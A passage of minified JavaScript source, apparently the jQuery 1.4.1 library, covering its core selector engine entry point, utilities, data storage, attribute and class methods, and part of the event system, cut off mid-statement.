(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context)},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,isSimple=/^.[^:#\[\.,]*$/,rnotwhite=/\S/,rtrim=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,rsingleTag=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,userAgent=navigator.userAgent,browserMatch,readyBound=false,readyList=[],DOMContentLoaded,toString=Object.prototype.toString,hasOwnProperty=Object.prototype.hasOwnProperty,push=Array.prototype.push,slice=Array.prototype.slice,indexOf=Array.prototype.indexOf;jQuery.fn=jQuery.prototype={init:function(selector,context){var match,elem,ret,doc;if(!selector){return this}if(selector.nodeType){this.context=this[0]=selector;this.length=1;return this}if(typeof selector==="string"){match=quickExpr.exec(selector);if(match&&(match[1]||!context)){if(match[1]){doc=(context?context.ownerDocument||context:document);ret=rsingleTag.exec(selector);if(ret){if(jQuery.isPlainObject(context)){selector=[document.createElement(ret[1])];jQuery.fn.attr.call(selector,context,true)}else{selector=[doc.createElement(ret[1])]}}else{ret=buildFragment([match[1]],[doc]);selector=(ret.cacheable?ret.fragment.cloneNode(true):ret.fragment).childNodes}}else{elem=document.getElementById(match[2]);if(elem){if(elem.id!==match[2]){return rootjQuery.find(selector)}this.length=1;this[0]=elem}this.context=document;this.selector=selector;return this}}else if(!context&&/^\w+$/.test(selector)){this.selector=selector;this.context=document;selector=document.getElementsByTagName(selector)}else if(!context||context.jquery){return(context||rootjQuery).find(selector)}else{return jQuery(context).find(selector)}}else if(jQuery.isFunction(selector)){return rootjQuery.ready(selector)}if(selector.selector!==undefined){this.selector=selector.selector;this.context=selector.context}return jQuery.isArray(selector)?this.setArray(selector):jQuery.makeArray(selector,this)},selector:"",jquery:"1.4.1",length:0,size:function(){return this.length},toArray:function(){return slice.call(this,0)},get:function(num){return num==null?this.toArray():(num<0?this.slice(num)[0]:this[num])},pushStack:function(elems,name,selector){var ret=jQuery(elems||null);ret.prevObject=this;ret.context=this.context;if(name==="find"){ret.selector=this.selector+(this.selector?" ":"")+selector}else if(name){ret.selector=this.selector+"."+name+"("+selector+")"}return ret},setArray:function(elems){this.length=0;push.apply(this,elems);return this},each:function(callback,args){return jQuery.each(this,callback,args)},ready:function(fn){jQuery.bindReady();if(jQuery.isReady){fn.call(document,jQuery)}else if(readyList){readyList.push(fn)}return this},eq:function(i){return i===-1?this.slice(i):this.slice(i,+i+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(slice.apply(this,arguments),"slice",slice.call(arguments).join(","))},map:function(callback){return this.pushStack(jQuery.map(this,function(elem,i){return callback.call(elem,i,elem)}))},end:function(){return this.prevObject||jQuery(null)},push:push,sort:[].sort,splice:[].splice};jQuery.fn.init.prototype=jQuery.fn;jQuery.extend=jQuery.fn.extend=function(){var target=arguments[0]||{},i=1,length=arguments.length,deep=false,options,name,src,copy;if(typeof target==="boolean"){deep=target;target=arguments[1]||{};i=2}if(typeof target!=="object"&&!jQuery.isFunction(target)){target={}}if(length===i){target=this;--i}for(;i<length;i++){if((options=arguments[i])!=null){for(name in options){src=target[name];copy=options[name];if(target===copy){continue}if(deep&&copy&&(jQuery.isPlainObject(copy)||jQuery.isArray(copy))){var clone=src&&(jQuery.isPlainObject(src)||jQuery.isArray(src))?src:jQuery.isArray(copy)?[]:{};target[name]=jQuery.extend(deep,clone,copy)}else if(copy!==undefined){target[name]=copy}}}}return target};jQuery.extend({noConflict:function(deep){window.$=_$;if(deep){window.jQuery=_jQuery}return jQuery},isReady:false,ready:function(){if(!jQuery.isReady){if(!document.body){return setTimeout(jQuery.ready,13)}jQuery.isReady=true;if(readyList){var fn,i=0;while((fn=readyList[i++])){fn.call(document,jQuery)}readyList=null}if(jQuery.fn.triggerHandler){jQuery(document).triggerHandler("ready")}}},bindReady:function(){if(readyBound){return}readyBound=true;if(document.readyState==="complete"){return jQuery.ready()}if(document.addEventListener){document.addEventListener("DOMContentLoaded",DOMContentLoaded,false);window.addEventListener("load",jQuery.ready,false)}else if(document.attachEvent){document.attachEvent("onreadystatechange",DOMContentLoaded);window.attachEvent("onload",jQuery.ready);var toplevel=false;try{toplevel=window.frameElement==null}catch(e){}if(document.documentElement.doScroll&&toplevel){doScrollCheck()}}},isFunction:function(obj){return toString.call(obj)==="[object Function]"},isArray:function(obj){return toString.call(obj)==="[object Array]"},isPlainObject:function(obj){if(!obj||toString.call(obj)!=="[object Object]"||obj.nodeType||obj.setInterval){return false}if(obj.constructor&&!hasOwnProperty.call(obj,"constructor")&&!hasOwnProperty.call(obj.constructor.prototype,"isPrototypeOf")){return false}var key;for(key in obj){}return key===undefined||hasOwnProperty.call(obj,key)},isEmptyObject:function(obj){for(var name in obj){return false}return true},error:function(msg){throw msg;},parseJSON:function(data){if(typeof data!=="string"||!data){return null}if(/^[\],:{}\s]*$/.test(data.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,""))){return window.JSON&&window.JSON.parse?window.JSON.parse(data):(new Function("return "+data))()}else{jQuery.error("Invalid JSON: "+data)}},noop:function(){},globalEval:function(data){if(data&&rnotwhite.test(data)){var head=document.getElementsByTagName("head")[0]||document.documentElement,script=document.createElement("script");script.type="text/javascript";if(jQuery.support.scriptEval){script.appendChild(document.createTextNode(data))}else{script.text=data}head.insertBefore(script,head.firstChild);head.removeChild(script)}},nodeName:function(elem,name){return elem.nodeName&&elem.nodeName.toUpperCase()===name.toUpperCase()},each:function(object,callback,args){var name,i=0,length=object.length,isObj=length===undefined||jQuery.isFunction(object);if(args){if(isObj){for(name in object){if(callback.apply(object[name],args)===false){break}}}else{for(;i<length;){if(callback.apply(object[i++],args)===false){break}}}}else{if(isObj){for(name in object){if(callback.call(object[name],name,object[name])===false){break}}}else{for(var value=object[0];i<length&&callback.call(value,i,value)!==false;value=object[++i]){}}}return object},trim:function(text){return(text||"").replace(rtrim,"")},makeArray:function(array,results){var ret=results||[];if(array!=null){if(array.length==null||typeof array==="string"||jQuery.isFunction(array)||(typeof array!=="function"&&array.setInterval)){push.call(ret,array)}else{jQuery.merge(ret,array)}}return ret},inArray:function(elem,array){if(array.indexOf){return array.indexOf(elem)}for(var i=0,length=array.length;i<length;i++){if(array[i]===elem){return i}}return-1},merge:function(first,second){var i=first.length,j=0;if(typeof second.length==="number"){for(var l=second.length;j<l;j++){first[i++]=second[j]}}else{while(second[j]!==undefined){first[i++]=second[j++]}}first.length=i;return first},grep:function(elems,callback,inv){var ret=[];for(var i=0,length=elems.length;i<length;i++){if(!inv!==!callback(elems[i],i)){ret.push(elems[i])}}return ret},map:function(elems,callback,arg){var ret=[],value;for(var i=0,length=elems.length;i<length;i++){value=callback(elems[i],i,arg);if(value!=null){ret[ret.length]=value}}return ret.concat.apply([],ret)},guid:1,proxy:function(fn,proxy,thisObject){if(arguments.length===2){if(typeof proxy==="string"){thisObject=fn;fn=thisObject[proxy];proxy=undefined}else if(proxy&&!jQuery.isFunction(proxy)){thisObject=proxy;proxy=undefined}}if(!proxy&&fn){proxy=function(){return fn.apply(thisObject||this,arguments)}}if(fn){proxy.guid=fn.guid=fn.guid||proxy.guid||jQuery.guid++}return proxy},uaMatch:function(ua){ua=ua.toLowerCase();var match=/(webkit)[ \/]([\w.]+)/.exec(ua)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(ua)||/(msie) ([\w.]+)/.exec(ua)||!/compatible/.test(ua)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(ua)||[];return{browser:match[1]||"",version:match[2]||"0"}},browser:{}});browserMatch=jQuery.uaMatch(userAgent);if(browserMatch.browser){jQuery.browser[browserMatch.browser]=true;jQuery.browser.version=browserMatch.version}if(jQuery.browser.webkit){jQuery.browser.safari=true}if(indexOf){jQuery.inArray=function(elem,array){return indexOf.call(array,elem)}}rootjQuery=jQuery(document);if(document.addEventListener){DOMContentLoaded=function(){document.removeEventListener("DOMContentLoaded",DOMContentLoaded,false);jQuery.ready()}}else if(document.attachEvent){DOMContentLoaded=function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",DOMContentLoaded);jQuery.ready()}}}function doScrollCheck(){if(jQuery.isReady){return}try{document.documentElement.doScroll("left")}catch(error){setTimeout(doScrollCheck,1);return}jQuery.ready()}function evalScript(i,elem){if(elem.src){jQuery.ajax({url:elem.src,async:false,dataType:"script"})}else{jQuery.globalEval(elem.text||elem.textContent||elem.innerHTML||"")}if(elem.parentNode){elem.parentNode.removeChild(elem)}}function access(elems,key,value,exec,fn,pass){var length=elems.length;if(typeof key==="object"){for(var k in key){access(elems,k,key[k],exec,fn,value)}return elems}if(value!==undefined){exec=!pass&&exec&&jQuery.isFunction(value);for(var i=0;i<length;i++){fn(elems[i],key,exec?value.call(elems[i],i,fn(elems[i],key)):value,pass)}return elems}return length?fn(elems[0],key):null}function now(){return(new Date).getTime()}(function(){jQuery.support={};var root=document.documentElement,script=document.createElement("script"),div=document.createElement("div"),id="script"+now();div.style.display="none";div.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var all=div.getElementsByTagName("*"),a=div.getElementsByTagName("a")[0];if(!all||!all.length||!a){return}jQuery.support={leadingWhitespace:div.firstChild.nodeType===3,tbody:!div.getElementsByTagName("tbody").length,htmlSerialize:!!div.getElementsByTagName("link").length,style:/red/.test(a.getAttribute("style")),hrefNormalized:a.getAttribute("href")==="/a",opacity:/^0.55$/.test(a.style.opacity),cssFloat:!!a.style.cssFloat,checkOn:div.getElementsByTagName("input")[0].value==="on",optSelected:document.createElement("select").appendChild(document.createElement("option")).selected,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};script.type="text/javascript";try{script.appendChild(document.createTextNode("window."+id+"=1;"))}catch(e){}root.insertBefore(script,root.firstChild);if(window[id]){jQuery.support.scriptEval=true;delete window[id]}root.removeChild(script);if(div.attachEvent&&div.fireEvent){div.attachEvent("onclick",function click(){jQuery.support.noCloneEvent=false;div.detachEvent("onclick",click)});div.cloneNode(true).fireEvent("onclick")}div=document.createElement("div");div.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";var fragment=document.createDocumentFragment();fragment.appendChild(div.firstChild);jQuery.support.checkClone=fragment.cloneNode(true).cloneNode(true).lastChild.checked;jQuery(function(){var div=document.createElement("div");div.style.width=div.style.paddingLeft="1px";document.body.appendChild(div);jQuery.boxModel=jQuery.support.boxModel=div.offsetWidth===2;document.body.removeChild(div).style.display='none';div=null});var eventSupported=function(eventName){var el=document.createElement("div");eventName="on"+eventName;var isSupported=(eventName in el);if(!isSupported){el.setAttribute(eventName,"return;");isSupported=typeof el[eventName]==="function"}el=null;return isSupported};jQuery.support.submitBubbles=eventSupported("submit");jQuery.support.changeBubbles=eventSupported("change");root=script=div=all=a=null})();jQuery.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var expando="jQuery"+now(),uuid=0,windowData={};var emptyObject={};jQuery.extend({cache:{},expando:expando,noData:{"embed":true,"object":true,"applet":true},data:function(elem,name,data){if(elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()]){return}elem=elem==window?windowData:elem;var id=elem[expando],cache=jQuery.cache,thisCache;if(!name&&!id){return null}if(!id){id=++uuid}if(typeof name==="object"){elem[expando]=id;thisCache=cache[id]=jQuery.extend(true,{},name)}else if(cache[id]){thisCache=cache[id]}else if(typeof data==="undefined"){thisCache=emptyObject}else{thisCache=cache[id]={}}if(data!==undefined){elem[expando]=id;thisCache[name]=data}return typeof name==="string"?thisCache[name]:thisCache},removeData:function(elem,name){if(elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()]){return}elem=elem==window?windowData:elem;var id=elem[expando],cache=jQuery.cache,thisCache=cache[id];if(name){if(thisCache){delete thisCache[name];if(jQuery.isEmptyObject(thisCache)){jQuery.removeData(elem)}}}else{try{delete elem[expando]}catch(e){if(elem.removeAttribute){elem.removeAttribute(expando)}}delete cache[id]}}});jQuery.fn.extend({data:function(key,value){if(typeof key==="undefined"&&this.length){return jQuery.data(this[0])}else if(typeof key==="object"){return this.each(function(){jQuery.data(this,key)})}var parts=key.split(".");parts[1]=parts[1]?"."+parts[1]:"";if(value===undefined){var data=this.triggerHandler("getData"+parts[1]+"!",[parts[0]]);if(data===undefined&&this.length){data=jQuery.data(this[0],key)}return data===undefined&&parts[1]?this.data(parts[0]):data}else{return this.trigger("setData"+parts[1]+"!",[parts[0],value]).each(function(){jQuery.data(this,key,value)})}},removeData:function(key){return this.each(function(){jQuery.removeData(this,key)})}});jQuery.extend({queue:function(elem,type,data){if(!elem){return}type=(type||"fx")+"queue";var q=jQuery.data(elem,type);if(!data){return q||[]}if(!q||jQuery.isArray(data)){q=jQuery.data(elem,type,jQuery.makeArray(data))}else{q.push(data)}return q},dequeue:function(elem,type){type=type||"fx";var queue=jQuery.queue(elem,type),fn=queue.shift();if(fn==="inprogress"){fn=queue.shift()}if(fn){if(type==="fx"){queue.unshift("inprogress")}fn.call(elem,function(){jQuery.dequeue(elem,type)})}}});jQuery.fn.extend({queue:function(type,data){if(typeof type!=="string"){data=type;type="fx"}if(data===undefined){return jQuery.queue(this[0],type)}return this.each(function(i,elem){var queue=jQuery.queue(this,type,data);if(type==="fx"&&queue[0]!=="inprogress"){jQuery.dequeue(this,type)}})},dequeue:function(type){return this.each(function(){jQuery.dequeue(this,type)})},delay:function(time,type){time=jQuery.fx?jQuery.fx.speeds[time]||time:time;type=type||"fx";return this.queue(type,function(){var elem=this;setTimeout(function(){jQuery.dequeue(elem,type)},time)})},clearQueue:function(type){return this.queue(type||"fx",[])}});var rclass=/[\n\t]/g,rspace=/\s+/,rreturn=/\r/g,rspecialurl=/href|src|style/,rtype=/(button|input)/i,rfocusable=/(button|input|object|select|textarea)/i,rclickable=/^(a|area)$/i,rradiocheck=/radio|checkbox/;jQuery.fn.extend({attr:function(name,value){return access(this,name,value,true,jQuery.attr)},removeAttr:function(name,fn){return this.each(function(){jQuery.attr(this,name,"");if(this.nodeType===1){this.removeAttribute(name)}})},addClass:function(value){if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.addClass(value.call(this,i,self.attr("class")))})}if(value&&typeof value==="string"){var classNames=(value||"").split(rspace);for(var i=0,l=this.length;i<l;i++){var elem=this[i];if(elem.nodeType===1){if(!elem.className){elem.className=value}else{var className=" "+elem.className+" ";for(var c=0,cl=classNames.length;c<cl;c++){if(className.indexOf(" "+classNames[c]+" ")<0){elem.className+=" "+classNames[c]}}}}}}return this},removeClass:function(value){if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.removeClass(value.call(this,i,self.attr("class")))})}if((value&&typeof value==="string")||value===undefined){var classNames=(value||"").split(rspace);for(var i=0,l=this.length;i<l;i++){var elem=this[i];if(elem.nodeType===1&&elem.className){if(value){var className=(" "+elem.className+" ").replace(rclass," ");for(var c=0,cl=classNames.length;c<cl;c++){className=className.replace(" "+classNames[c]+" "," ")}elem.className=className.substring(1,className.length-1)}else{elem.className=""}}}}return this},toggleClass:function(value,stateVal){var type=typeof value,isBool=typeof stateVal==="boolean";if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.toggleClass(value.call(this,i,self.attr("class"),stateVal),stateVal)})}return this.each(function(){if(type==="string"){var className,i=0,self=jQuery(this),state=stateVal,classNames=value.split(rspace);while((className=classNames[i++])){state=isBool?state:!self.hasClass(className);self[state?"addClass":"removeClass"](className)}}else if(type==="undefined"||type==="boolean"){if(this.className){jQuery.data(this,"__className__",this.className)}this.className=this.className||value===false?"":jQuery.data(this,"__className__")||""}})},hasClass:function(selector){var className=" "+selector+" ";for(var i=0,l=this.length;i<l;i++){if((" "+this[i].className+" ").replace(rclass," ").indexOf(className)>-1){return true}}return false},val:function(value){if(value===undefined){var elem=this[0];if(elem){if(jQuery.nodeName(elem,"option")){return(elem.attributes.value||{}).specified?elem.value:elem.text}if(jQuery.nodeName(elem,"select")){var index=elem.selectedIndex,values=[],options=elem.options,one=elem.type==="select-one";if(index<0){return null}for(var i=one?index:0,max=one?index+1:options.length;i<max;i++){var option=options[i];if(option.selected){value=jQuery(option).val();if(one){return value}values.push(value)}}return values}if(rradiocheck.test(elem.type)&&!jQuery.support.checkOn){return elem.getAttribute("value")===null?"on":elem.value}return(elem.value||"").replace(rreturn,"")}return undefined}var isFunction=jQuery.isFunction(value);return this.each(function(i){var self=jQuery(this),val=value;if(this.nodeType!==1){return}if(isFunction){val=value.call(this,i,self.val())}if(typeof val==="number"){val+=""}if(jQuery.isArray(val)&&rradiocheck.test(this.type)){this.checked=jQuery.inArray(self.val(),val)>=0}else if(jQuery.nodeName(this,"select")){var values=jQuery.makeArray(val);jQuery("option",this).each(function(){this.selected=jQuery.inArray(jQuery(this).val(),values)>=0});if(!values.length){this.selectedIndex=-1}}else{this.value=val}})}});jQuery.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(elem,name,value,pass){if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined}if(pass&&name in jQuery.attrFn){return jQuery(elem)[name](value)}var notxml=elem.nodeType!==1||!jQuery.isXMLDoc(elem),set=value!==undefined;name=notxml&&jQuery.props[name]||name;if(elem.nodeType===1){var special=rspecialurl.test(name);if(name==="selected"&&!jQuery.support.optSelected){var parent=elem.parentNode;if(parent){parent.selectedIndex;if(parent.parentNode){parent.parentNode.selectedIndex}}}if(name in elem&&notxml&&!special){if(set){if(name==="type"&&rtype.test(elem.nodeName)&&elem.parentNode){jQuery.error("type property can't be changed")}elem[name]=value}if(jQuery.nodeName(elem,"form")&&elem.getAttributeNode(name)){return elem.getAttributeNode(name).nodeValue}if(name==="tabIndex"){var attributeNode=elem.getAttributeNode("tabIndex");return attributeNode&&attributeNode.specified?attributeNode.value:rfocusable.test(elem.nodeName)||rclickable.test(elem.nodeName)&&elem.href?0:undefined}return elem[name]}if(!jQuery.support.style&&notxml&&name==="style"){if(set){elem.style.cssText=""+value}return elem.style.cssText}if(set){elem.setAttribute(name,""+value)}var attr=!jQuery.support.hrefNormalized&&notxml&&special?elem.getAttribute(name,2):elem.getAttribute(name);return attr===null?undefined:attr}return jQuery.style(elem,name,value)}});var fcleanup=function(nm){return nm.replace(/[^\w\s\.\|`]/g,function(ch){return"\\"+ch})};jQuery.event={add:function(elem,types,handler,data){if(elem.nodeType===3||elem.nodeType===8){return}if(elem.setInterval&&(elem!==window&&!elem.frameElement)){elem=window}if(!handler.guid){handler.guid=jQuery.guid++}if(data!==undefined){var fn=handler;handler=jQuery.proxy(fn);handler.data=data}var events=jQuery.data(elem,"events")||jQuery.data(elem,"events",{}),handle=jQuery.data(elem,"handle"),eventHandle;if(!handle){eventHandle=function(){return typeof jQuery!=="undefined"&&!jQuery.event.triggered?jQuery.event.handle.apply(eventHandle.elem,arguments):undefined};handle=jQuery.data(elem,"handle",eventHandle)}if(!handle){return}handle.elem=elem;types=types.split(/\s+/);var type,i=0;while((type=types[i++])){var namespaces=type.split(".");type=namespaces.shift();if(i>1){handler=jQuery.proxy(handler);if(data!==undefined){handler.data=data}}handler.type=namespaces.slice(0).sort().join(".");var handlers=events[type],special=this.special[type]||{};if(!handlers){handlers=events[type]={};if(!special.setup||special.setup.call(elem,data,namespaces,handler)===false){if(elem.addEventListener){elem.addEventListener(type,handle,false)}else if(elem.attachEvent){elem.attachEvent("on"+type,handle)}}}if(special.add){var modifiedHandler=special.add.call(elem,handler,data,namespaces,handlers);if(modifiedHandler&&jQuery.isFunction(modifiedHandler)){modifiedHandler.guid=modifiedHandler.guid||handler.guid;modifiedHandler.data=modifiedHandler.data||handler.data;modifiedHandler.type=modifiedHandler.type||handler.type;handler=modifiedHandler}}handlers[handler.guid]=handler;this.global[type]=true}elem=null},global:{},remove:function(elem,types,handler){if(elem.nodeType===3||elem.nodeType===8){return}var events=jQuery.data(elem,"events"),ret,type,fn;if(events){if(types===undefined||(typeof types==="string"&&types.charAt(0)===".")){for(type in events){this.remove(elem,type+(types||""))}}else{if(types.type){handler=types.handler;types=types.type}types=types.split(/\s+/);var i=0;while((type=types[i++])){var namespaces=type.split(".");type=namespaces.shift();var all=!namespaces.length,cleaned=jQuery.map(namespaces.slice(0).sort(),fcleanup),namespace=new RegExp("(^|\\.)"+cleaned.join("\\.(?:.*\\.)?")+"(\\.|$)"),special=this.special[type]||{};if(events[type]){if(handler){fn=events[type][handler.guid];delete events[type][handler.guid]}else{for(var handle in events[type]){if(all||namespace.test(events[type][handle].type)){delete events[type][handle]}}}if(special.remove){special.remove.call(elem,namespaces,fn)}for(ret in events[type]){break}if(!ret){if(!special.teardown||special.teardown.call(elem,namespaces)===false){if(elem.removeEventListener){elem.removeEventListener(type,jQuery.data(elem,"handle"),false)}else if(elem.detachEvent){elem.detachEvent("on"+type,jQuery.data(elem,"handle"))}}ret=null;delete events[type]}}}}for(ret in events){break}if(!ret){var handle=jQuery.data(elem,"handle");if(handle){handle.elem=null}jQuery.removeData(elem,"events");jQuery.removeData(elem,"handle")}}},trigger:function(event,data,elem){var type=event.type||event,bubbling=arguments[3];if(!bubbling){event=typeof event==="object"?event[expando]?event:jQuery.extend(jQuery.Event(type),event):jQuery.Event(type);if(type.indexOf("!")>=0){event.type=type=type.slice(0,-1);event.exclusive=true}if(!elem){event.stopPropagation();if(this.global[type]){jQuery.each(jQuery.cache,function(){if(this.events&&this.events[type]){jQuery.event.trigger(event,data,this.handle.elem)}})}}if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined}event.result=undefined;event.target=elem;data=jQuery.makeArray(data);data.unshift(event)}event.currentTarget=elem;var handle=jQuery.data(elem,"handle");if(handle){handle.apply(elem,data)}var parent=elem.parentNode||elem.ownerDocument;try{if(!(elem&&elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()])){if(elem["on"+type]&&elem["on"+type].apply(elem,data)===false){event.result=false}}}catch(e){}if(!event.isPropagationStopped()&&parent){jQuery.event.trigger(event,data,parent,true)}else if(!event.isDefaultPrevented()){var target=event.target,old,isClick=jQuery.nodeName(target,"a")&&type==="click";if(!isClick&&!(target&&target.nodeName&&jQuery.noData[target.nodeName.toLowerCase()])){try{if(target[type]){old=target["on"+type];if(old){target["on"+type]=null}this.triggered=true;target[type]()}}catch(e){}if(old){target["on"+type]=old}this.triggered=false}}},handle:function(event){var all,handlers;event=arguments[0]=jQuery.event.fix(event||window.event);event.currentTarget=this;var namespaces=event.type.split(".");event.type=namespaces.shift();all=!namespaces.length&&!event.exclusive;var namespace=new RegExp("(^|\\.)"+namespaces.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)");handlers=(jQuery.data(this,"events")||{})[event.type];for(var j in handlers){var handler=handlers[j];if(all||namespace.test(handler.type)){event.handler=handler;event.data=handler.data;var ret=handler.apply(this,arguments);if(ret!==undefined){event.result=ret;if(ret===false){event.preventDefault();event.stopPropagation()}}if(event.isImmediatePropagationStopped()){break}}}return event.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(event){if(event[expando]){return event}var originalEvent=event;event=jQuery.Event(originalEvent);for(var i=this.props.length,prop;i;){prop=this.props[--i];event[prop]=originalEvent[prop]}if(!event.target){event.target=event.srcElement||document}if(event.target.nodeType===3){event.target=event.target.parentNode}if(!event.relatedTarget&&event.fromElement){event.relatedTarget=event.fromElement===event.target?event.toElement:event.fromElement}if(event.pageX==null&&event.clientX!=null){var doc=document.documentElement,body=document.body;event.pageX=event.clientX+(doc&&doc.scrollLeft||body&&body.scrollLeft||0)-(doc&&doc.clientLeft||body&&body.clientLeft||0);event.pageY=event.clientY+(doc&&doc.scrollTop||body&&body.scrollTop||0)-(doc&&doc.clientTop||body&&body.clientTop||0)}if(!event.which&&((event.charCode||event.charCode===0)?event.charCode:event.keyCode)){event.which=event.charCode||event.keyCode}if(!event.metaKey&&event.ctrlKey){event.metaKey=event.ctrlKey}if(!event.which&&event.button!==undefined){event.which=(event.button&1?1:(event.button&2?3:(event.button&4?2:0)))}return event},guid:1E8,proxy:jQuery.proxy,special:{ready:{setup:jQuery.bindReady,teardown:jQuery.noop},live:{add:function(proxy,data,namespaces,live){jQuery.extend(proxy,data||{});proxy.guid+=data.selector+data.live;data.liveProxy=proxy;jQuery.event.add(this,data.live,liveHandler,data)},remove:function(namespaces){if(namespaces.length){var remove=0,name=new RegExp("(^|\\.)"+namespaces[0]+"(\\.|$)");jQuery.each((jQuery.data(this,"events").live||{}),function(){if(name.test(this.type)){remove++}});if(remove<1){jQuery.event.remove(this,namespaces[0],liveHandler)}}},special:{}},beforeunload:{setup:function(data,namespaces,fn){if(this.setInterval){this.onbeforeunload=fn}return false},teardown:function(namespaces,fn){if(this.onbeforeunload===fn){this.onbeforeunload=null}}}}};jQuery.Event=function(src){if(!this.preventDefault){return new jQuery.Event(src)}if(src&&src.type){this.originalEvent=src;this.type=src.type}else{this.type=src}this.timeStamp=now();this[expando]=true};function returnFalse(){return false}function returnTrue(){return true}jQuery.Event.prototype={preventDefault:function(){this.isDefaultPrevented=returnTrue;var e=this.originalEvent;if(!e){return}if(e.preventDefault){e.preventDefault()}e.returnValue=false},stopPropagation:function(){this.isPropagationStopped=returnTrue;var e=this.originalEvent;if(!e){return}if(e.stopPropagation){e.stopPropagation()}e.cancelBubble=true},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=returnTrue;this.stopPropagation()},isDefaultPrevented:returnFalse,isPropagationStopped:returnFalse,isImmediatePropagationStopped:returnFalse};var withinElement=function(event){var parent=event.relatedTarget;while(parent&&parent!==this){try{parent=parent.parentNode}catch(e){break}}if(parent!==this){event.type=event.data;jQuery.event.handle.apply(this,arguments)}},delegate=function(event){event.type=event.data;jQuery.event.handle.apply(this,arguments)};jQuery.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(orig,fix){jQuery.event.special[orig]={setup:function(data){jQuery.event.add(this,fix,data&&data.selector?delegate:withinElement,orig)},teardown:function(data){jQuery.event.remove(this,fix,data&&data.selector?delegate:withinElement)}}});if(!jQuery.support.submitBubbles){jQuery.event.special.submit={setup:function(data,namespaces,fn){if(this.nodeName.toLowerCase()!=="form"){jQuery.event.add(this,"click.specialSubmit."+fn.guid,function(e){var elem=e.target,type=elem.type;if((type==="submit"||type==="image")&&jQuery(elem).closest("form").length){return trigger("submit",this,arguments)}});jQuery.event.add(this,"keypress.specialSubmit."+fn.guid,function(e){var elem=e.target,type=elem.type;if((type==="text"||type==="password")&&jQuery(elem).closest("form").length&&e.keyCode===13){return trigger("submit",this,arguments)}})}else{return false}},remove:function(namespaces,fn){jQuery.event.remove(this,"click.specialSubmit"+(fn?"."+fn.guid:""));jQuery.event.remove(this,"keypress.specialSubmit"+(fn?"."+fn.guid:""))}}}if(!jQuery.support.changeBubbles){var formElems=/textarea|input|select/i;function getVal(elem){var type=elem.type,val=elem.value;if(type==="radio"||type==="checkbox"){val=elem.checked}else if(type==="select-multiple"){val=elem.selectedIndex>-1?jQuery.map(elem.options,function(elem){return elem.selected}).join("-"):""}else if(elem.nodeName.toLowerCase()==="select"){val=elem.selectedIndex}return val}function testChange(e){var elem=e.target,data,val;if(!formElems.test(elem.nodeName)||elem.readOnly){return}data=jQuery.data(elem,"_change_data");val=getVal(elem);if(e.type!=="focusout"||elem.type!=="radio"){jQuery.data(elem,"_change_data",val)}if(data===undefined||val===data){return}if(data!=null||val){e.type="change";return jQuery.event.trigger(e,arguments[1],elem)}}jQuery.event.special.change={filters:{focusout:testChange,click:function(e){var elem=e.target,type=elem.type;if(type==="radio"||type==="checkbox"||elem.nodeName.toLowerCase()==="select"){return testChange.call(this,e)}},keydown:function(e){var elem=e.target,type=elem.type;if((e.keyCode===13&&elem.nodeName.toLowerCase()!=="textarea")||(e.keyCode===32&&(type==="checkbox"||type==="radio"))||type==="select-multiple"){return testChange.call(this,e)}},beforeactivate:function(e){var elem=e.target;if(elem.nodeName.toLowerCase()==="input"&&elem.type==="radio"){jQuery.data(elem,"_change_data",getVal(elem))}}},setup:function(data,namespaces,fn){for(var type in changeFilters){jQuery.event.add(this,type+".specialChange."+fn.guid,changeFilters[type])}return formElems.test(this.nodeName)},remove:function(namespaces,fn){for(var type in changeFilters){jQuery.event.remove(this,type+".specialChange"+(fn?"."+fn.guid:""),changeFilters[type])}return formElems.test(this.nodeName)}};var changeFilters=jQuery.event.special.change.filters}function trigger(type,elem,args){args[0].type=type;return jQuery.event.handle.apply(elem,args)}if(document.addEventListener){jQuery.each({focus:"focusin",blur:"focusout"},function(orig,fix){jQuery.event.special[fix]={setup:function(){this.addEventListener(orig,handler,true)},teardown:function(){this.removeEventListener(orig,handler,true)}};function handler(e){e=jQuery.event.fix(e);e.type=fix;return jQuery.event.handle.call(this,e)}})}jQuery.each(["bind","one"],function(i,name){jQuery.fn[name]=function(type,data,fn){if(typeof type==="object"){for(var key in type){this[name](key,data,type[key],fn)}return this}if(jQuery.isFunction(data)){fn=data;data=undefined}var handler=name==="one"?jQuery.proxy(fn,function(event){jQuery(this).unbind(event,handler);return fn.apply(this,arguments)}):fn;return 